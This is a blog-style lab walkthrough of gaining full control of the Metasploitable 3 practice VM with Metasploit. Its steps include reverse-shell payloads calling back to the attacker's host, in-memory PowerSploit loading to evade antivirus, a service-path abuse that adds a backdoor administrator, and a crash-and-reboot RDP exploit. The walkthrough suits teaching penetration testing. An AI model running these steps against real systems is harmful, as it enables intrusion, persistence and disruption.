Step by step Metasploit walkthrough
Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine.
I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and more than often, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user.
Step 1: Reconaissance
Before actually hacking your way in, you need to find more information about your target. You have to find out the ip adress, running services and possible vulnerable services to choose your attack vector.
Let's start with a simple netdiscover scan to find the IP adress of our target. To do so, just type netdiscover in your terminal. I know 192.168.0.149 is my own adress, so the ip adress of my host should be 192.168.0.206.
Note: as I wrote this blogpost over a longer period, the used ip addresses later in this blogpost of the target machine can vary from 192.168.0.205 to 192.168.0.206
Let's continue with an Nmap scan to find running services:
nmap -sV 192.168.0.206
We find an Apache webserver running on port 8022. Let's look into that.
Open firefox and enter the IP adress + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick google search learns us there is an exploit available! Bingo!
Step 2: exploit a service to get a shell
Now we have identified a vulnerable service and an available exploit, it's start to exploit the machine:
Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering:
After executing the search command, we find the Manage Engine Desktop Central 9 exploit we've found via google.
To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete.
Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here:
- RHOST: the target address. This will be the IP address of our target host - 192.168.0.206
- RPORT: the target port. During our Nmap portscan, we found the service running on 8022.
- TARGETURI : the path for the Desktop Central software. Leave this is the standard setting.
To set your own settings, you need to execute set SETTING value, e.g.:
set RHOST 192.168.0.206
set RPORT 8022
Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage.
Now we have setup the exploit, we need to attach a payload to it. Usually, our payload is spawning a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will setup a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a windows command line or a Windows powershell.
A very interesting payload is meterpreteter one because it is capable of so much more of simpy spawning a shell. Meterpreter is an advanced multi-function payload that is superior to other payloads because in contrast to other payloads that execute one command (such as adding a user or spawning a shell), meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, installing backdoor, privilege escalation and so on.
Another significant advantage is that meterpeter fully resides in the memory by using DLL injection in existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes which would be easily picked up by Antiviruses or Itrusion Detection Systems.
To attach a meterpreter payload to our exploit, use the following command:
set payload windows/meterpreter/reverse_tcp
If you run show options again now, you will see that Payloads options are visible now:
- LHOST: the host where the meterpreter will connect back to. This will be the address of our own Kali VM 192.168.0.241
- LHOST: the port where the meterpreter will connect back to. Choose any available port you like or leave it on 4444.
Set our listen adress to our own address:
set LHOST 192.168.0.241
We're set to fire the exploit. Simply type:
As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower privilege shell.
Because we only have a lower privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are number of options available, but always try the easy way first. Execute getsystem to try Meterpreter to execute a few tricks in its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case Windows Command Line), just type shell.
A very powerful Windows privilege escalation framework is Powersploit, written in Powershell. We downloaded and extracted the zip file on our Desktop in a folder Powersploit. We will start a web server with PowerShell, so we can easily call them via our meterpreter shell. Navigate to the unzipped folder and start a web server via the following command:
We're set to fire the exploit. Simply type:
python -m SimpleHTTPServer
Let's return to our Meterpreter session. It is possible to spawn a Powershell shell within Meterpreter but it's far easier to load scripts such as Powersploit if you immediately spawn a reverse PowerShell with the payload.
To do so, we will exit the meterpreter session and add a PowerShell payload instead of a meterpreter payload to our exploit by entering the command below. Quickly check show options to verify if the listen address is still correct.
set payload windows/powershell_reverse_tcp
And we have a PowerShell session! You can ignore the Invoke-Expression errors.
This is where it gets a bit more advanced. We can not just download Powersploit to our target system, as this will more than likely raise red flags by Antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in the memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework.
To download the script in the memory, execute the following command in PowerShell:
Next, we execute a function from the scripts called Invoke-AllChecks, which will check the target host for attack vectors for privilege escalation. To make it easier to read, we will output the result to a file named allchecks.txt
Invoke-AllChecks | Out-File allchecks.txt
To check-out the results, open a new terminal and launch a new instance of Metasploit and get the meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port as we are already using 4444 in our PowerShell session (see left terminal window on the screenshot below).
Now we have two shells running on the same target host, a PowerShell and a meterpreter shell. To download the all-checks.txt file, execute download allchecks.txt with meterpreter. Download a copy of the allchecks.txt here.
As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted servicepaths, hackable DLL locations, unattended install files, etc..
Let's focus on these unquoted servicepaths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added to. As services are run by the system user, this would mean that our custom command also is executed as system user. Nice!
The catch however is that you also need improperly configured write access rights to these services to add your custom command. PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. By example, for abusing the service Jenkins, we would need to execute the following command: Install-ServiceBinary -Name 'jenkins'. Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights.
Maybe PowerSploit didn't catch all unquoted servicepaths. Let's check manually in our open meterpreter shell. First get a Windows Command Line by executing shell.
Execute the following command:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Using this method, we find 4 possible vulnerable services. One of these services, OpenSSHd was not in the list of PowerSploit. Let's try to exploit this service.
Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the Readme of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group.
Install-ServiceBinary -Name 'OpenSSHd'
Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified if the user John was added, but no luck.
There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks to force a reboot.
We found a vulnerability to the MS12-020 bug, exploited by CVE-2012-0002.
Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and and execute it. This exploits sends a sequence of specially crafted RDP packets to an affected system causing it to crash and reboot. (make sure to watch your Metasploitable 3 VM when launching this exploit)
Your active Windows Command Line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the meterpreter shell.
Spawn a Windows Command Line by executing shell and check with net users if our exploit worked.
It worked! We have created a new user named John, which is part of the Administrators group. We know from the PowerSploit Readme that his password is Password123!.
Next step is to actually login with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details.
Another cool trick is spawning a remote Desktop. Could be very usefull for enumeration of the box or disabling firewall (rules) if the PSExec should not work.